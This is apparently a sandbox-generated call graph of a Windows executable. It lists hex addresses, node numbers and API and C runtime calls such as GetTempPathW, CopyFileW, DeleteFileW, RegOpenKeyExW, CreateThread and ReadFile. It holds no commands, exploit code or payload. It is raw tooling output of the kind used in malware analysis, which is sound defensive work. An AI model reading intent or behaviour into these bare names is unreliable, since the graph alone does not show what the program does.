9399be 100144->100700 100161 93950e _wcscat 100145->100161 100149 8d506b 74 API calls 100151 939567 100149->100151 100150 93954b 100150->100051 100152 8d506b 74 API calls 100151->100152 100153 939577 100152->100153 100155 8d506b 74 API calls 100153->100155 100154 9394c3 _wcscat _wcscpy 100707 8f432e 58 API calls __wsplitpath_helper 100154->100707 100157 939592 100155->100157 100158 8d506b 74 API calls 100157->100158 100159 9395a2 100158->100159 100160 8d506b 74 API calls 100159->100160 100162 9395bd 100160->100162 100161->100149 100161->100150 100163 8d506b 74 API calls 100162->100163 100164 9395cd 100163->100164 100165 8d506b 74 API calls 100164->100165 100166 9395dd 100165->100166 100167 8d506b 74 API calls 100166->100167 100168 9395ed 100167->100168 100670 939b6d GetTempPathW GetTempFileNameW 100168->100670 100170 9395f9 100171 8f548b 115 API calls 100170->100171 100181 93960a 100171->100181 100172 9396c4 100684 8f55d6 100172->100684 100174 9396cf 100176 9396d5 DeleteFileW 100174->100176 100177 9396e9 100174->100177 100175 8d506b 74 API calls 100175->100181 100176->100150 100178 93978f CopyFileW 100177->100178 100183 9396f3 _wcsncpy 100177->100183 100179 9397b7 DeleteFileW 100178->100179 100180 9397a5 DeleteFileW 100178->100180 100697 939b2c CreateFileW 100179->100697 100180->100150 100181->100150 100181->100172 100181->100175 100671 8f4a93 100181->100671 100708 938d90 100183->100708 100187 93977e DeleteFileW 100187->100150 100188->99977 100189->100013 100190->100027 100192 8d4fb4 100191->100192 100193 8d4fbb 100191->100193 100194 8f55d6 __fcloseall 83 API calls 100192->100194 100195 8d4fdb FreeLibrary 100193->100195 100196 8d4fca 100193->100196 100194->100193 100195->100196 100196->99986 100246 8d4d61 100197->100246 100200 8d4d61 2 API calls 100203 8d4d3a 100200->100203 100201 8d4d4a FreeLibrary 100202 8d4d53 100201->100202 100204 8f548b 100202->100204 100203->100201 100203->100202 100250 8f54a0 100204->100250 100206 8d4f5c 100206->100060 100206->100061 100408 8d4d94 100207->100408 100209 8d4ced 100212 8d4cff FreeLibrary 100209->100212 100213 8d4d08 100209->100213 100211 8d4d94 2 API calls 100211->100209 100212->100213 100214 8d4dd0 100213->100214 100215 8f0ff6 Mailbox 59 API calls 100214->100215 100216 8d4de5 100215->100216 100217 8d538e 59 API calls 100216->100217 100218 8d4df1 _memmove 100217->100218 100219 8d4e2c 100218->100219 100221 8d4ee9 100218->100221 100222 8d4f21 100218->100222 100220 8d5027 69 API calls 100219->100220 100230 8d4e35 100220->100230 100412 8d4fe9 CreateStreamOnHGlobal 100221->100412 100423 939ba5 95 API calls 100222->100423 100225 8d506b 74 API calls 100225->100230 100227 8d4ec9 100227->100069 100228 90dcd0 100229 8d5045 85 API calls 100228->100229 100231 90dce4 100229->100231 100230->100225 100230->100227 100230->100228 100418 8d5045 100230->100418 100232 8d506b 74 API calls 100231->100232 100232->100227 100234 8d507d 100233->100234 100235 90ddf6 100233->100235 100447 8f5812 100234->100447 100238 939393 100645 9391e9 100238->100645 100240 9393a9 100240->100076 100242 8d5036 100241->100242 100245 90ddb9 100241->100245 100650 8f5e90 100242->100650 100244 8d503e 100247 8d4d2e 100246->100247 100248 8d4d6a LoadLibraryA 100246->100248 100247->100200 100247->100203 100248->100247 100249 8d4d7b GetProcAddress 100248->100249 100249->100247 100252 8f54ac __write 100250->100252 100251 8f54bf 100299 8f8d68 58 API calls __getptd_noexit 100251->100299 100252->100251 100255 8f54f0 100252->100255 100254 8f54c4 100300 8f8ff6 9 API calls _W_expandtime 100254->100300 100269 900738 100255->100269 100258 8f54f5 100259 8f54fe 100258->100259 100260 8f550b 100258->100260 100301 8f8d68 58 API calls __getptd_noexit 100259->100301 100262 8f5535 100260->100262 100263 8f5515 100260->100263 100284 900857 100262->100284 100302 8f8d68 58 API calls __getptd_noexit 100263->100302 100265 8f54cf __write @_EH4_CallFilterFunc@8 100265->100206 100270 900744 __write 100269->100270 100271 8f9e4b __lock 58 API calls 100270->100271 100281 900752 100271->100281 100272 9007c6 100304 90084e 100272->100304 100273 9007cd 100309 8f8a5d 58 API calls 2 library calls 100273->100309 100276 900843 __write 100276->100258 100277 9007d4 100277->100272 100310 8fa06b InitializeCriticalSectionAndSpinCount 100277->100310 100278 8f9ed3 __mtinitlocknum 58 API calls 100278->100281 100281->100272 100281->100273 100281->100278 100307 8f6e8d 59 API calls __lock 100281->100307 100308 8f6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 100281->100308 100282 9007fa EnterCriticalSection 100282->100272 100293 900877 __wopenfile 100284->100293 100285 900891 100315 8f8d68 58 API calls __getptd_noexit 100285->100315 100286 900a4c 100286->100285 100290 900aaf 100286->100290 100288 900896 100316 8f8ff6 9 API calls _W_expandtime 100288->100316 100312 9087f1 100290->100312 100291 8f5540 100303 8f5562 LeaveCriticalSection LeaveCriticalSection _fprintf 100291->100303 100293->100285 100293->100286 100317 8f3a0b 60 API calls 2 library calls 100293->100317 100295 900a45 100295->100286 100318 8f3a0b 60 API calls 2 library calls 100295->100318 100297 900a64 100297->100286 100319 8f3a0b 60 API calls 2 library calls 100297->100319 100299->100254 100300->100265 100301->100265 100302->100265 100303->100265 100311 8f9fb5 LeaveCriticalSection 100304->100311 100306 900855 100306->100276 100307->100281 100308->100281 100309->100277 100310->100282 100311->100306 100320 907fd5 100312->100320 100314 90880a 100314->100291 100315->100288 100316->100291 100317->100295 100318->100297 100319->100286 100321 907fe1 __write 100320->100321 100322 907ff7 100321->100322 100325 90802d 100321->100325 100405 8f8d68 58 API calls __getptd_noexit 100322->100405 100324 907ffc 100406 8f8ff6 9 API calls _W_expandtime 100324->100406 100331 90809e 100325->100331 100328 908049 100407 908072 LeaveCriticalSection __unlock_fhandle 100328->100407 100330 908006 __write 100330->100314 100332 9080be 100331->100332 100333 8f471a __wsopen_nolock 58 API calls 100332->100333 100336 9080da 100333->100336 100334 8f9006 __invoke_watson 8 API calls 100335 9087f0 100334->100335 100338 907fd5 __wsopen_helper 103 API calls 100335->100338 100337 908114 100336->100337 100344 908137 100336->100344 100404 908211 100336->100404 100339 8f8d34 __write 58 API calls 100337->100339 100340 90880a 100338->100340 100341 908119 100339->100341 100340->100328 100342 8f8d68 _W_expandtime 58 API calls 100341->100342 100343 908126 100342->100343 100346 8f8ff6 _W_expandtime 9 API calls 100343->100346 100345 9081f5 100344->100345 100353 9081d3 100344->100353 100347 8f8d34 __write 58 API calls 100345->100347 100348 908130 100346->100348 100349 9081fa 100347->100349 100348->100328 100350 8f8d68 _W_expandtime 58 API calls 100349->100350 100351 908207 100350->100351 100352 8f8ff6 _W_expandtime 9 API calls 100351->100352 100352->100404 100354 8fd4d4 __alloc_osfhnd 61 API calls 100353->100354 100355 9082a1 100354->100355 100356 9082ab 100355->100356 100357 9082ce 100355->100357 100359 8f8d34 __write 58 API calls 100356->100359 100358 907f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100357->100358 100368 9082f0 100358->100368 100360 9082b0 100359->100360 100362 8f8d68 _W_expandtime 58 API calls 100360->100362 100361 90836e GetFileType 100365 908379 GetLastError 100361->100365 100366 9083bb 100361->100366 100364 9082ba 100362->100364 100363 90833c GetLastError 100369 8f8d47 __dosmaperr 58 API calls 100363->100369 100370 8f8d68 _W_expandtime 58 API calls 100364->100370 100367 8f8d47 __dosmaperr 58 API calls 100365->100367 100376 8fd76a __set_osfhnd 59 API calls 100366->100376 100371 9083a0 CloseHandle 100367->100371 100368->100361 100368->100363 100372 907f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100368->100372 100373 908361 100369->100373 100370->100348 100371->100373 100374 9083ae 100371->100374 100375 908331 100372->100375 100378 8f8d68 _W_expandtime 58 API calls 100373->100378 100377 8f8d68 _W_expandtime 58 API calls 100374->100377 100375->100361 100375->100363 100380 9083d9 100376->100380 100379 9083b3 100377->100379 100378->100404 100379->100373 100381 908594 100380->100381 100382 901b11 __lseeki64_nolock 60 API calls 100380->100382 100396 90845a 100380->100396 100384 908767 CloseHandle 100381->100384 100381->100404 100383 908443 100382->100383 100387 8f8d34 __write 58 API calls 100383->100387 100383->100396 100385 907f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 100384->100385 100386 90878e 100385->100386 100389 908796 GetLastError 100386->100389 100390 9087c2 100386->100390 100387->100396 100388 9010ab 70 API calls __read_nolock 100388->100396 100391 8f8d47 __dosmaperr 58 API calls 100389->100391 100390->100404 100392 9087a2 100391->100392 100395 8fd67d __free_osfhnd 59 API calls 100392->100395 100393 900d2d __close_nolock 61 API calls 100393->100396 100394 90848c 100394->100396 100397 9099f2 __chsize_nolock 82 API calls 100394->100397 100395->100390 100396->100381 100396->100388 100396->100393 100396->100394 100398 8fdac6 __write 78 API calls 100396->100398 100399 908611 100396->100399 100401 901b11 60 API calls __lseeki64_nolock 100396->100401 100397->100394 100398->100396 100400 900d2d __close_nolock 61 API calls 100399->100400 100402 908618 100400->100402 100401->100396 100403 8f8d68 _W_expandtime 58 API calls 100402->100403 100403->100404 100404->100334 100405->100324 100406->100330 100407->100330 100409 8d4ce1 100408->100409 100410 8d4d9d LoadLibraryA 100408->100410 100409->100209 100409->100211 100410->100409 100411 8d4dae GetProcAddress 100410->100411 100411->100409 100413 8d5003 FindResourceExW 100412->100413 100417 8d5020 100412->100417 100414 90dd5c LoadResource 100413->100414 100413->100417 100415 90dd71 SizeofResource 100414->100415 100414->100417 100416 90dd85 LockResource 100415->100416 100415->100417 100416->100417 100417->100219 100419 90ddd4 100418->100419 100420 8d5054 100418->100420 100424 8f5a7d 100420->100424 100422 8d5062 100422->100230 100423->100219 100427 8f5a89 __write 100424->100427 100425 8f5a9b 100437 8f8d68 58 API calls __getptd_noexit 100425->100437 100427->100425 100428 8f5ac1 100427->100428 100439 8f6e4e 100428->100439 100429 8f5aa0 100438 8f8ff6 9 API calls _W_expandtime 100429->100438 100434 8f5ad6 100446 8f5af8 LeaveCriticalSection LeaveCriticalSection _fprintf 100434->100446 100436 8f5aab __write 100436->100422 100437->100429 100438->100436 100440 8f6e5e 100439->100440 100441 8f6e80 EnterCriticalSection 100439->100441 100440->100441 100442 8f6e66 100440->100442 100443 8f5ac7 100441->100443 100444 8f9e4b __lock 58 API calls 100442->100444 100445 8f59ee 83 API calls 5 library calls 100443->100445 100444->100443 100445->100434 100446->100436 100450 8f582d 100447->100450 100449 8d508e 100449->100238 100451 8f5839 __write 100450->100451 100452 8f587c 100451->100452 100453 8f5874 __write 100451->100453 100455 8f584f _memset 100451->100455 100454 8f6e4e __lock_file 59 API calls 100452->100454 100453->100449 100456 8f5882 100454->100456 100477 8f8d68 58 API calls __getptd_noexit 100455->100477 100463 8f564d 100456->100463 100458 8f5869 100478 8f8ff6 9 API calls _W_expandtime 100458->100478 100464 8f5683 100463->100464 100468 8f5668 _memset 100463->100468 100479 8f58b6 LeaveCriticalSection LeaveCriticalSection _fprintf 100464->100479 100465 8f5673 100575 8f8d68 58 API calls __getptd_noexit 100465->100575 100467 8f5678 100576 8f8ff6 9 API calls _W_expandtime 100467->100576 100468->100464 100468->100465 100474 8f56c3 100468->100474 100471 8f57d4 _memset 100578 8f8d68 58 API calls __getptd_noexit 100471->100578 100474->100464 100474->100471 100480 8f4916 100474->100480 100487 9010ab 100474->100487 100555 900df7 100474->100555 100577 900f18 58 API calls 3 library calls 100474->100577 100477->100458 100478->100453 100479->100453 100481 8f4935 100480->100481 100482 8f4920 100480->100482 100481->100474 100579 8f8d68 58 API calls __getptd_noexit 100482->100579 100484 8f4925 100580 8f8ff6 9 API calls _W_expandtime 100484->100580 100486 8f4930 100486->100474 100488 9010e3 100487->100488 100489 9010cc 100487->100489 100490 90181b 100488->100490 100494 90111d 100488->100494 100590 8f8d34 58 API calls __getptd_noexit 100489->100590 100606 8f8d34 58 API calls __getptd_noexit 100490->100606 100493 9010d1 100591 8f8d68 58 API calls __getptd_noexit 100493->100591 100497 901125 100494->100497 100505 90113c 100494->100505 100495 901820 100607 8f8d68 58 API calls __getptd_noexit 100495->100607 100592 8f8d34 58 API calls __getptd_noexit 100497->100592 100499 9010d8 100499->100474 100501 901131 100608 8f8ff6 9 API calls _W_expandtime 100501->100608 100502 90112a 100593 8f8d68 58 API calls __getptd_noexit 100502->100593 100504 901151 100594 8f8d34 58 API calls __getptd_noexit 100504->100594 100505->100499 100505->100504 100506 90116b 100505->100506 100509 901189 100505->100509 100506->100504 100511 901176 100506->100511 100595 8f8a5d 58 API calls 2 library calls 100509->100595 100581 905ebb 100511->100581 100512 901199 100514 9011a1 100512->100514 100515 9011bc 100512->100515 100596 8f8d68 58 API calls __getptd_noexit 100514->100596 100598 901b11 60 API calls 3 library calls 100515->100598 100516 90128a 100517 901303 ReadFile 100516->100517 100520 9012a0 GetConsoleMode 100516->100520 100521 9017e3 GetLastError 100517->100521 100522 901325 100517->100522 100524 901300 100520->100524 100525 9012b4 100520->100525 100526 9017f0 100521->100526 100527 9012e3 100521->100527 100522->100521 100532 9012f5 100522->100532 100523 9011a6 100597 8f8d34 58 API calls __getptd_noexit 100523->100597 100524->100517 100525->100524 100529 9012ba ReadConsoleW 100525->100529 100604 8f8d68 58 API calls __getptd_noexit 100526->100604 100530 9012e9 100527->100530 100599 8f8d47 58 API calls 3 library calls 100527->100599 100529->100532 100534 9012dd GetLastError 100529->100534 100530->100499 100537 8f2f95 _free 58 API calls 100530->100537 100532->100530 100542 9015c7 100532->100542 100544 90135a 100532->100544 100533 9017f5 100605 8f8d34 58 API calls __getptd_noexit 100533->100605 100534->100527 100537->100499 100539 9013c6 ReadFile 100545 9013e7 GetLastError 100539->100545 100554 9013f1 100539->100554 100540 901504 100549 9014b4 MultiByteToWideChar 100540->100549 100602 901b11 60 API calls 3 library calls 100540->100602 100541 9014f4 100601 8f8d68 58 API calls __getptd_noexit 100541->100601 100542->100530 100543 9016cd ReadFile 100542->100543 100547 9016f0 GetLastError 100543->100547 100553 9016fe 100543->100553 100544->100539 100548 901447 100544->100548 100545->100554 100547->100553 100548->100530 100548->100540 100548->100541 100548->100549 100549->100530 100549->100534 100553->100542 100603 901b11 60 API calls 3 library calls 100553->100603 100554->100544 100600 901b11 60 API calls 3 library calls 100554->100600 100556 900e02 100555->100556 100560 900e17 100555->100560 100642 8f8d68 58 API calls __getptd_noexit 100556->100642 100558 900e07 100643 8f8ff6 9 API calls _W_expandtime 100558->100643 100561 900e4c 100560->100561 100567 900e12 100560->100567 100644 906234 58 API calls __malloc_crt 100560->100644 100563 8f4916 __fputwc_nolock 58 API calls 100561->100563 100564 900e60 100563->100564 100609 900f97 100564->100609 100566 900e67 100566->100567 100568 8f4916 __fputwc_nolock 58 API calls 100566->100568 100567->100474 100569 900e8a 100568->100569 100569->100567 100570 8f4916 __fputwc_nolock 58 API calls 100569->100570 100571 900e96 100570->100571 100571->100567 100572 8f4916 __fputwc_nolock 58 API calls 100571->100572 100573 900ea3 100572->100573 100574 8f4916 __fputwc_nolock 58 API calls 100573->100574 100574->100567 100575->100467 100576->100464 100577->100474 100578->100467 100579->100484 100580->100486 100582 905ed3 100581->100582 100583 905ec6 100581->100583 100585 905edf 100582->100585 100586 8f8d68 _W_expandtime 58 API calls 100582->100586 100584 8f8d68 _W_expandtime 58 API calls 100583->100584 100587 905ecb 100584->100587 100585->100516 100588 905f00 100586->100588 100587->100516 100589 8f8ff6 _W_expandtime 9 API calls 100588->100589 100589->100587 100590->100493 100591->100499 100592->100502 100593->100501 100594->100502 100595->100512 100596->100523 100597->100499 100598->100511 100599->100530 100600->100554 100601->100530 100602->100549 100603->100553 100604->100533 100605->100530 100606->100495 100607->100501 100608->100499 100610 900fa3 __write 100609->100610 100611 900fb0 100610->100611 100612 900fc7 100610->100612 100613 8f8d34 __write 58 API calls 100611->100613 100614 90108b 100612->100614 100617 900fdb 100612->100617 100616 900fb5 100613->100616 100615 8f8d34 __write 58 API calls 100614->100615 100624 900ffe 100615->100624 100620 8f8d68 _W_expandtime 58 API calls 100616->100620 100618 901006 100617->100618 100619 900ff9 100617->100619 100622 901013 100618->100622 100623 901028 100618->100623 100621 8f8d34 __write 58 API calls 100619->100621 100631 900fbc __write 100620->100631 100621->100624 100625 8f8d34 __write 58 API calls 100622->100625 100626 8fd446 ___lock_fhandle 59 API calls 100623->100626 100627 8f8d68 _W_expandtime 58 API calls 100624->100627 100628 901018 100625->100628 100629 90102e 100626->100629 100630 901020 100627->100630 100632 8f8d68 _W_expandtime 58 API calls 100628->100632 100633 901041 100629->100633 100634 901054 100629->100634 100637 8f8ff6 _W_expandtime 9 API calls 100630->100637 100631->100566 100632->100630 100636 9010ab __read_nolock 70 API calls 100633->100636 100635 8f8d68 _W_expandtime 58 API calls 100634->100635 100638 901059 100635->100638 100639 90104d 100636->100639 100637->100631 100640 8f8d34 __write 58 API calls 100638->100640 100641 901083 __read LeaveCriticalSection 100639->100641 100640->100639 100641->100631 100642->100558 100643->100567 100644->100561 100648 8f543a GetSystemTimeAsFileTime 100645->100648 100647 9391f8 100647->100240 100649 8f5468 __aulldiv 100648->100649 100649->100647 100651 8f5e9c __write 100650->100651 100652 8f5eae 100651->100652 100653 8f5ec3 100651->100653 100664 8f8d68 58 API calls __getptd_noexit 100652->100664 100655 8f6e4e __lock_file 59 API calls 100653->100655 100657 8f5ec9 100655->100657 100656 8f5eb3 100665 8f8ff6 9 API calls _W_expandtime 100656->100665 100666 8f5b00 67 API calls 5 library calls 100657->100666 100660 8f5ed4 100667 8f5ef4 LeaveCriticalSection LeaveCriticalSection _fprintf 100660->100667 100662 8f5ee6 100663 8f5ebe __write 100662->100663 100663->100244 100664->100656 100665->100663 100666->100660 100667->100662 100668->100117 100669->100119 100670->100170 100672 8f4a9f __write 100671->100672 100673 8f4acd __write 100672->100673 100674 8f4abd 100672->100674 100675 8f4ad5 100672->100675 100673->100181 100751 8f8d68 58 API calls __getptd_noexit 100674->100751 100676 8f6e4e __lock_file 59 API calls 100675->100676 100678 8f4adb 100676->100678 100739 8f493a 100678->100739 100679 8f4ac2 100752 8f8ff6 9 API calls _W_expandtime 100679->100752 100685 8f55e2 __write 100684->100685 100686 8f560e 100685->100686 100687 8f55f6 100685->100687 100689 8f6e4e __lock_file 59 API calls 100686->100689 100693 8f5606 __write 100686->100693 100913 8f8d68 58 API calls __getptd_noexit 100687->100913 100691 8f5620 100689->100691 100690 8f55fb 100914 8f8ff6 9 API calls _W_expandtime 100690->100914 100897 8f556a 100691->100897 100693->100174 100698 939b52 SetFileTime CloseHandle 100697->100698 100699 939b68 100697->100699 100698->100699 100699->100150 100702 9399d2 __tzset_nolock _wcscmp 100700->100702 100701 8d506b 74 API calls 100701->100702 100702->100701 100703 939393 GetSystemTimeAsFileTime 100702->100703 100704 93949a 100702->100704 100705 8d5045 85 API calls 100702->100705 100703->100702 100704->100150 100706 8f432e 58 API calls __wsplitpath_helper 100704->100706 100705->100702 100706->100154 100707->100161 100709 938d9b 100708->100709 100710 938da9 100708->100710 100711 8f548b 115 API calls 100709->100711 100712 938dee 100710->100712 100713 8f548b 115 API calls 100710->100713 100738 938db2 100710->100738 100711->100710 100991 93901b 100712->100991 100715 938dd3 100713->100715 100715->100712 100717 938ddc 100715->100717 100716 938e32 100721 8f55d6 __fcloseall 83 API calls 100717->100721 100717->100738 100721->100738 100738->100179 100738->100187 100742 8f4949 100739->100742 100746 8f4967 100739->100746 100740 8f4957 100782 8f8d68 58 API calls __getptd_noexit 100740->100782 100742->100740 100742->100746 100749 8f4981 _memmove 100742->100749 100743 8f495c 100783 8f8ff6 9 API calls _W_expandtime 100743->100783 100753 8f4b0d LeaveCriticalSection LeaveCriticalSection _fprintf 100746->100753 100748 8f4916 __fputwc_nolock 58 API calls 100748->100749 100749->100746 100749->100748 100754 8fdac6 100749->100754 100784 8f4c6d 100749->100784 100790 8fb05e 78 API calls 6 library calls 100749->100790 100751->100679 100752->100673 100753->100673 100755 8fdad2 __write 100754->100755 100756 8fdadf 100755->100756 100757 8fdaf6 100755->100757 100864 8f8d34 58 API calls __getptd_noexit 100756->100864 100758 8fdb95 100757->100758 100760 8fdb0a 100757->100760 100870 8f8d34 58 API calls __getptd_noexit 100758->100870 100763 8fdb28 100760->100763 100764 8fdb32 100760->100764 100762 8fdae4 100865 8f8d68 58 API calls __getptd_noexit 100762->100865 100866 8f8d34 58 API calls __getptd_noexit 100763->100866 100791 8fd446 100764->100791 100765 8fdb2d 100871 8f8d68 58 API calls __getptd_noexit 100765->100871 100779 8fdaeb __write 100779->100749 100782->100743 100783->100746 100785 8f4c80 100784->100785 100789 8f4ca4 100784->100789 100786 8f4916 __fputwc_nolock 58 API calls 100785->100786 100785->100789 100787 8f4c9d 100786->100787 100788 8fdac6 __write 78 API calls 100787->100788 100788->100789 100789->100749 100790->100749 100792 8fd452 __write 100791->100792 100864->100762 100865->100779 100866->100765 100870->100765 100898 8f558d 100897->100898 100899 8f5579 100897->100899 100901 8f4c6d __flush 78 API calls 100898->100901 100903 8f5589 100898->100903 100946 8f8d68 58 API calls __getptd_noexit 100899->100946 100904 8f5599 100901->100904 100902 8f557e 100947 8f8ff6 9 API calls _W_expandtime 100902->100947 100915 8f5645 LeaveCriticalSection LeaveCriticalSection _fprintf 100903->100915 100916 900dc7 100904->100916 100908 8f4916 __fputwc_nolock 58 API calls 100909 8f55a7 100908->100909 100913->100690 100914->100693 100915->100693 100917 900dd4 100916->100917 100919 8f55a1 100916->100919 100918 8f2f95 _free 58 API calls 100917->100918 100917->100919 100918->100919 100919->100908 100946->100902 100947->100903 100992 939040 100991->100992 100994 939029 __tzset_nolock _memmove 100991->100994 100993 8f5812 __fread_nolock 74 API calls 100992->100993 100993->100994 100994->100716 101034 926641 101033->101034 101035 92665e 101033->101035 101034->101035 101037 926621 59 API calls Mailbox 101034->101037 101035->99523 101037->101034 101038 8d568a 101039 8d5c18 59 API calls 101038->101039 101040 8d569c 101039->101040 101041 8d5632 61 API calls 101040->101041 101042 8d56aa 101041->101042 101044 8d56ba Mailbox 101042->101044 101045 8d81c1 61 API calls Mailbox 101042->101045 101045->101044 101046 910226 101054 8dade2 Mailbox 101046->101054 101048 910c86 101049 9266f4 Mailbox 59 API calls 101048->101049 101050 910c8f 101049->101050 101052 9100e0 VariantClear 101052->101054 101053 8db6c1 101062 93a0b5 89 API calls 4 library calls 101053->101062 101054->101048 101054->101050 101054->101052 101054->101053 101056 94e237 130 API calls 101054->101056 101057 93d2e6 101 API calls 101054->101057 101058 94474d 341 API calls 101054->101058 101059 8e2123 95 API calls 101054->101059 101060 8d9df0 59 API calls Mailbox 101054->101060 101061 927405 59 API calls 101054->101061 101056->101054 101057->101054 101058->101054 101059->101054 101060->101054 101061->101054 101062->101048 101063 8d1055 101068 8d2649 101063->101068 101066 8f2f80 __cinit 67 API calls 101067 8d1064 101066->101067 101069 8d77c7 59 API calls 101068->101069 101070 8d26b7 101069->101070 101075 8d3582 101070->101075 101072 8d2754 101074 8d105a 101072->101074 101078 8d3416 59 API calls 2 library calls 101072->101078 101074->101066 101079 8d35b0 101075->101079 101078->101072 101080 8d35bd 101079->101080 101081 8d35a1 101079->101081 101080->101081 101082 8d35c4 RegOpenKeyExW 101080->101082 101081->101072 101082->101081 101083 8d35de RegQueryValueExW 101082->101083 101084 8d3614 RegCloseKey 101083->101084 101085 8d35ff 101083->101085 101084->101081 101085->101084 101086 8d1016 101091 8d4ad2 101086->101091 101089 8f2f80 __cinit 67 API calls 101090 8d1025 101089->101090 101092 8f0ff6 Mailbox 59 API calls 101091->101092 101093 8d4ada 101092->101093 101095 8d101b 101093->101095 101098 8d4a94 101093->101098 101095->101089 101099 8d4a9d 101098->101099 101100 8d4aaf 101098->101100 101101 8f2f80 __cinit 67 API calls 101099->101101 101102 8d4afe 101100->101102 101101->101100 101103 8d77c7 59 API calls 101102->101103 101104 8d4b16 GetVersionExW 101103->101104 101105 8d7d2c 59 API calls 101104->101105 101106 8d4b59 101105->101106 101107 8d7e8c 59 API calls 101106->101107 101116 8d4b86 101106->101116 101108 8d4b7a 101107->101108 101109 8d7886 59 API calls 101108->101109 101109->101116 101110 8d4bf1 GetCurrentProcess IsWow64Process 101111 8d4c0a 101110->101111 101113 8d4c89 GetSystemInfo 101111->101113 101114 8d4c20 101111->101114 101112 90dc8d 101115 8d4c56 101113->101115 101126 8d4c95 101114->101126 101115->101095 101116->101110 101116->101112 101119 8d4c7d GetSystemInfo 101121 8d4c47 101119->101121 101120 8d4c32 101122 8d4c95 2 API calls 101120->101122 101121->101115 101124 8d4c4d FreeLibrary 101121->101124 101123 8d4c3a GetNativeSystemInfo 101122->101123 101123->101121 101124->101115 101127 8d4c2e 101126->101127 101128 8d4c9e LoadLibraryA 101126->101128 101127->101119 101127->101120 101128->101127 101129 8d4caf GetProcAddress 101128->101129 101129->101127 101130 8d1066 101135 8df8cf 101130->101135 101132 8d106c 101133 8f2f80 __cinit 67 API calls 101132->101133 101134 8d1076 101133->101134 101136 8df8f0 101135->101136 101168 8f0143 101136->101168 101140 8df937 101141 8d77c7 59 API calls 101140->101141 101142 8df941 101141->101142 101143 8d77c7 59 API calls 101142->101143 101144 8df94b 101143->101144 101145 8d77c7 59 API calls 101144->101145 101146 8df955 101145->101146 101147 8d77c7 59 API calls 101146->101147 101148 8df993 101147->101148 101149 8d77c7 59 API calls 101148->101149 101150 8dfa5e 101149->101150 101178 8e60e7 101150->101178 101154 8dfa90 101155 8d77c7 59 API calls 101154->101155 101156 8dfa9a 101155->101156 101206 8effde 101156->101206 101158 8dfae1 101159 8dfaf1 GetStdHandle 101158->101159 101160 8dfb3d 101159->101160 101161 9149d5 101159->101161 101162 8dfb45 OleInitialize 101160->101162 101161->101160 101163 9149de 101161->101163 101162->101132 101213 936dda 64 API calls Mailbox 101163->101213 101165 9149e5 101214 9374a9 CreateThread 101165->101214 101167 9149f1 CloseHandle 101167->101162 101215 8f021c 101168->101215 101171 8f021c 59 API calls 101172 8f0185 101171->101172 101173 8d77c7 59 API calls 101172->101173 101174 8f0191 101173->101174 101175 8d7d2c 59 API calls 101174->101175 101176 8df8f6 101175->101176 101177 8f03a2 6 API calls 101176->101177 101177->101140 101179 8d77c7 59 API calls 101178->101179 101180 8e60f7 101179->101180 101181 8d77c7 59 API calls 101180->101181 101182 8e60ff 101181->101182 101222 8e5bfd 101182->101222 101185 8e5bfd 59 API calls 101186 8e610f 101185->101186 101187 8d77c7 59 API calls 101186->101187 101188 8e611a 101187->101188 101189 8f0ff6 Mailbox 59 API calls 101188->101189 101190 8dfa68 101189->101190 101191 8e6259 101190->101191 101192 8e6267 101191->101192 101193 8d77c7 59 API calls 101192->101193 101194 8e6272 101193->101194 101195 8d77c7 59 API calls 101194->101195 101196 8e627d 101195->101196 101197 8d77c7 59 API calls 101196->101197 101198 8e6288 101197->101198 101199 8d77c7 59 API calls 101198->101199 101200 8e6293 101199->101200 101201 8e5bfd 59 API calls 101200->101201 101202 8e629e 101201->101202 101203 8f0ff6 Mailbox 59 API calls 101202->101203 101204 8e62a5 RegisterWindowMessageW 101203->101204 101204->101154 101207 8effee 101206->101207 101208 925cc3 101206->101208 101209 8f0ff6 Mailbox 59 API calls 101207->101209 101225 939d71 60 API calls 101208->101225 101211 8efff6 101209->101211 101211->101158 101212 925cce 101213->101165 101214->101167 101226 93748f 65 API calls 101214->101226 101216 8d77c7 59 API calls 101215->101216 101217 8f0227 101216->101217 101218 8d77c7 59 API calls 101217->101218 101219 8f022f 101218->101219 101220 8d77c7 59 API calls 101219->101220 101221 8f017b 101220->101221 101221->101171 101223 8d77c7 59 API calls 101222->101223 101224 8e5c05 101223->101224 101224->101185 101225->101212 101227 8f7e93 101228 8f7e9f __write 101227->101228 101264 8fa048 GetStartupInfoW 101228->101264 101230 8f7ea4 101266 8f8dbc GetProcessHeap 101230->101266 101232 8f7efc 101233 8f7f07 101232->101233 101349 8f7fe3 58 API calls 3 library calls 101232->101349 101267 8f9d26 101233->101267 101236 8f7f0d 101237 8f7f18 __RTC_Initialize 101236->101237 101350 8f7fe3 58 API calls 3 library calls 101236->101350 101288 8fd812 101237->101288 101240 8f7f27 101241 8f7f33 GetCommandLineW 101240->101241 101351 8f7fe3 58 API calls 3 library calls 101240->101351 101307 905173 GetEnvironmentStringsW 101241->101307 101245 8f7f32 101245->101241 101247 8f7f4d 101248 8f7f58 101247->101248 101352 8f32f5 58 API calls 3 library calls 101247->101352 101317 904fa8 101248->101317 101251 8f7f5e 101252 8f7f69 101251->101252 101353 8f32f5 58 API calls 3 library calls 101251->101353 101331 8f332f 101252->101331 101255 8f7f71 101256 8f7f7c __wwincmdln 101255->101256 101354 8f32f5 58 API calls 3 library calls 101255->101354 101337 8d492e 101256->101337 101259 8f7f90 101260 8f7f9f 101259->101260 101355 8f3598 58 API calls _doexit 101259->101355 101356 8f3320 58 API calls _doexit 101260->101356 101263 8f7fa4 __write 101265 8fa05e 101264->101265 101265->101230 101266->101232 101357 8f33c7 36 API calls 2 library calls 101267->101357 101269 8f9d2b 101358 8f9f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 101269->101358 101271 8f9d30 101272 8f9d34 101271->101272 101360 8f9fca TlsAlloc 101271->101360 101359 8f9d9c 61 API calls 2 library calls 101272->101359 101275 8f9d39 101275->101236 101276 8f9d46 101276->101272 101277 8f9d51 101276->101277 101361 8f8a15 101277->101361 101280 8f9d93 101369 8f9d9c 61 API calls 2 library calls 101280->101369 101283 8f9d98 101283->101236 101284 8f9d72 101284->101280 101285 8f9d78 101284->101285 101368 8f9c73 58 API calls 4 library calls 101285->101368 101287 8f9d80 GetCurrentThreadId 101287->101236 101289 8fd81e __write 101288->101289 101290 8f9e4b __lock 58 API calls 101289->101290 101291 8fd825 101290->101291 101292 8f8a15 __calloc_crt 58 API calls 101291->101292 101294 8fd836 